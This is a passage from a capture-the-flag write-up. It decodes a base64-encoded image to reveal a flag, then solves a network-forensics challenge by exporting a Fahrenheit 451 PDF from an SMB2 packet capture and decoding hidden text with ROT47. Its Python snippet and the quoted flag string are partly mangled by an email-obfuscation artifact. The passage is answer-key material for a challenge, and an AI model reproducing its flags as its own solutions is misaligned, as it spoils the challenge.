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gAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAFBHAAAAAighgAAAARQQwAACAIgIYAABAEQEMAACgiAAGAABQRAADAAAoIoABAAAUEcAAAACKCGAAAABFBDAAAIAiAhgAAEARAQwAAKCIAAYAAFBEAAMAACgigAEAABQRwAAAAIoIYAAAAEUEMAAAgCICGAAAQBEBDAAAoIgABgAAUEQAAwAAKCKAAQAAlPi///f/AeKHHZ424Vi9AAAAAElFTkSuQmCC \
| base64 -d > image.png

Opening the file then revealed the flag.

In this challenge we're given a dump of packets that have been captured over a network, and the story is that you were analysing the network while somebody was using a windows network share. Windows network sharing uses the SMB2, or Server Message Protocol, and so we get some good information when filtering for SMB2.

One packet that seems interesting contains the info Close Request File: Fahrenheit 451 Full Text .pdf, and so we know the file that was being transferred. File > Export Objects > SMB lets us export this to a pdf for us to view.

When comparing this pdf to original copies of Fahrenheit 451, we found some invisible text in the book containing the string '[email protected]@<DPP`P'.

When exploring ways that these characters may be encrypted, we tested to see if this was just shifting the ascii characters up or down, and so we tested reversing it as such:

st = "[email protected]@<DPP`P"
l = [ord(x) for x in st]

for i in range(120):
    print "+{}: {}".format(i, ''.join([chr(x+i) for x in l]))

We seemed to get something resembling the flag when the characters were shifted up +47 in the ascii table, but this resulted in some unprintable characters at the end of the string.

"auctf{burn_the_books\x7f\x7f\x8f\x7f}"

However, as this pattern emerged when the characters were shifted up 47, this indicated that the encoding being used was not ascii shifting, but rather ROT47. Decoding it accordingly got us the correct flag.

auctf{burn_the_books!!1!}